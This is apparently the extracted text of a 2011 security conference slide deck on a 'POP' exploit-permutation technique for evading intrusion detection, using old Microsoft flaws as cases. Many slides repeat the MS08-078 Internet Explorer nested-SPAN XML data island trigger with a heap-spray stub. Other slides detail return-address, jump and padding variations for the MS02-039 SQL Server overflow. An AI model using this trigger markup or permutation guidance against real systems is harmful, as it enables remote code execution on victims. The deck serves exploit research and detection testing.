0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
eax ecx
![Page 99: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/99.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
eax ecx
![Page 100: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/100.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
eax ecx
![Page 101: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/101.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
ecx
![Page 102: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/102.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
ecx
![Page 103: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/103.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
ecx
![Page 104: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/104.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
![Page 105: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/105.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t Trigger
![Page 106: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/106.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t Permutation
![Page 107: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/107.jpg)
vulnerability memory manipulation
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN> <SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
Internet Explorer (Data Consumers)
Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
Data Consumer #02
0x0a0a0a0a DATAFLD
shellcode (sprayed into the heap)
XML Data Source Object #02
0a0a0a0a.00n00b00r00 i00t00o00.00n00e00t
Exploitation
![Page 108: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/108.jpg)
![Page 109: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/109.jpg)
Approach Unconditional
Complete (YES)
Incomplete (NO)
Vulnerable Ecosystem Document Alternatives?
Alternatives?
Exploitation Detection
Vulnerability
Documentation?
Alternatives Arbitrary code Attack detection
Reverse Engineer Reversing?
Obfuscation
Alternatives
Permutation
![Page 110: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/110.jpg)
POPed MS02-039
• SQL Request: – CLNT_UCAST_INST (0x04).
• SQL INSTANCENAME:
– ASCII hexa values from 0x01 to 0xff, except: 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c.
– 24,000 permutations.
• Return address: – Uses the “jump to register” technique, in this
case the ESP register. – There are four (4) new possible return addresses
within SQLSORT.DLL (Microsoft SQL Server 2000 SP0/SP1/SP2). There are much more return addresses if do not mind making it hardcoded.
– Tools: “Findjmp.c” by Ryan Permeh, (“Hacking Proof your Network – Second Edition”, 2002), and “DumpOp.c” by Koskya Kortchinsky (“Macro reliability in Win32 Exploits” – Black Hat Europe, 2007).
– 4 permutations.
• JUMP: – Unconditional JUMP short, relative, and
forward to REL8. – There are 115 possible values to REL8. – 115 permutations.
• Writable address and memory alignment:
– There are 26,758 new writable addresses within SQLSORT.DLL (Microsoft SQL Server 2000 SP0/SP1/SP2). There are much more writable addresses if do not mind making it hardcoded.
– Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and “OlyDBG 2.01 alpha 2” by Oleh Yuschuk.
– 26,758 permutations.
• Padding and memory alignment: – ASCII hexa values from 0x01 to 0xff. – The length may vary, depending on JUMP, from
3,048 to 29,210 possibilities. – 29,210 permutations.
![Page 111: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/111.jpg)
POPed MS08-078
![Page 112: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/112.jpg)
POPed MS08-078
![Page 113: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/113.jpg)
POPed MS08-078
CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
![Page 114: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/114.jpg)
POPed MS08-078
CVE-2008-4844 “…crafted XML document containing nested <SPAN> elements…”
![Page 115: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/115.jpg)
POPed MS08-078 • XML Data Island:
– There are two (2) options: using the Dynamic HTML (DHTML) <XML> element within the HTML document or overloading the HTML <SCRIPT> element. Unfortunately, the HTML <SCRIPT> element is useless.
• Data Source Object (DSO):
– The HTML <XML> element holds a reference to a XML DSO, but a XML DSO can also be a reference used by another HTML element:
• <OBJECT>. – The HTML <OBJECT> element uses Class ID
to reference: XML DSO or Tabular Data Control (TDC).
– 4 permutations.
• Reference: – Characters like “<” and “&” are illegal in <XML>
element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). But the <XML> element can be also defined as “<” instead of “<”.
– Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO.
– 4 permutations.
• Data Consumer (HTML elements): – According to MSDN (“Binding HTML Elements
to Data”) there are, at least, fifteen (15) bindable HTML elements available, but only five (5) elements are useful.
– The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does not have to be the same HTML element to do so – it can be any mixed HTML element.
– 25 permutations.
• Return address: – Uses “Heap Spray” technique, in this case the
XML DSO handles the return address, and can use “.NET DLL” technique by Mark Dowd and Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008).
– There are, at least, four (4) new possible return addresses.
– 4 permutations.
![Page 116: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/116.jpg)
POPed MS08-078 • XML Data Island:
– There are two (2) options: using the Dynamic HTML (DHTML) <XML> element within the HTML document or overloading the HTML <SCRIPT> element. Unfortunately, the HTML <SCRIPT> element is useless.
• Data Source Object (DSO):
– The HTML <XML> element holds a reference to a XML DSO, but a XML DSO can also be a reference used by another HTML element:
• <OBJECT>. – The HTML <OBJECT> element uses Class ID
to reference: XML DSO or Tabular Data Control (TDC).
– 4 permutations.
• Reference: – Characters like “<” and “&” are illegal in <XML>
element. To avoid errors <XML> element can be defined as CDATA (Unparsed Character Data). But the <XML> element can be also defined as “<” instead of “<”.
– Both <IMG SRC= > and <IMAGE SRC= > elements are useful as a XML DSO.
– 4 permutations.
• Data Consumer (HTML elements): – According to MSDN (“Binding HTML Elements
to Data”) there are, at least, fifteen (15) bindable HTML elements available, but only five (5) elements are useful.
– The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does not have to be the same HTML element to do so – it can be any mixed HTML element.
– 25 permutations.
• Return address: – Uses “Heap Spray” technique, in this case the
XML DSO handles the return address, and can use “.NET DLL” technique by Mark Dowd and Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008).
– There are, at least, four (4) new possible return addresses.
– 4 permutations.
![Page 117: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/117.jpg)
POPed MS08-078 • Workarounds for Pointer Reference Memory Corruption Vulnerability - CVE-2008-4844
… – Disable XML Island functionality
• Create a backup copy of the registry keys by using the following command from an elevated command prompt:
…
• Next, save the following to a file with a .REG extension, such as Disable_XML_Island.reg: Windows Registry Editor Version 5.00
[-HKEY_CLASSES_ROOT\CLSID\{379E501F-B231-11D1-ADC1-00805FC752D8}]
• Run Disable_XML_Island.reg with the following command from an elevated command prompt:
Regedit.exe /s Disable_XML_Island.reg
550DDA30-0541-11D2-9CA9-0060B0EC3D39 (XML Data Source Object 1.0)
F5078F1F-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 2.6)
F5078F39-C551-11D3-89B9-0000F81FE221 (XML Data Source Object 3.0)
F6D90F14-9C73-11D3-B32E-00C04F990BB4 (XML Data Source Object 3.0)
333C7BC4-460F-11D0-BC04-0080C7055A83 (Tabular Data Control)
![Page 118: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/118.jpg)
![Page 119: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/119.jpg)
Demonstration
DEMONSTRATION [Play Video]
![Page 120: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/120.jpg)
![Page 121: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/121.jpg)
Conclusions
• Some examples, applying POP technique, will be available. For further details, please refer to:
– http://about.me/nbrito
• POP examples are licensed under GNU General Public License version 2.
• The examples cover pretty old vulnerabilities, such as: – MS02-039: 3,328 days since published. – MS02-056: 3,258 days since published. – MS08-078: 990 days since published. – MS09-002: 935 days since published.
• POP is also not new:
– Encore-NG: 1,077 days since BUGTRAQ and FULL-DISCLOSURE.
– ENG++ : 643 days since H2HC 6th Edition.
• The POP technique is not part of any commercial or public tool and is freely available, although the examples were ported to work with Rapid7 Metasploit Framework – this is to show how flexible its approach and deployment is – hoping it can help people to understand the threat, improving their infra-structure, security solutions and development approach.
• POP technique can be freely applied, there are no restrictions… No other than laziness.
• POP technique can help different people, performing different tasks, such as:
– Penetration-testing. – Exploit and proof-of-concept tools
development. – Security solutions evaluation and tests. – Security solution Quality -Assurance . – Detection and protection mechanisms
development. – Etc…
![Page 122: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/122.jpg)
![Page 123: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/123.jpg)
Ruben Santamarta
“After reversing the patch (for a flaw I published) it turns out that they didn't fix the flaw but instead
they were ‘workarounding’ my public exploit by adding a check to the RPC handling routines.
This check looks for a hardcoded string that should be present, at a fixed offset, in every RPC request.
Obviously, since it is a hardcoded string, you can exploit this flaw again just by adding that string to
your RPC request... What's the real problem? Their product is flawed at
design level. It's not a patch but an IPS signature… :)”
![Page 124: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/124.jpg)
![Page 125: Vale Security Conference - 2011 - 13 - Nelson Brito](https://reader036.vdocuments.mx/reader036/viewer/2022062514/557ad2a5d8b42a2c0f8b5202/html5/thumbnails/125.jpg)
Any questions?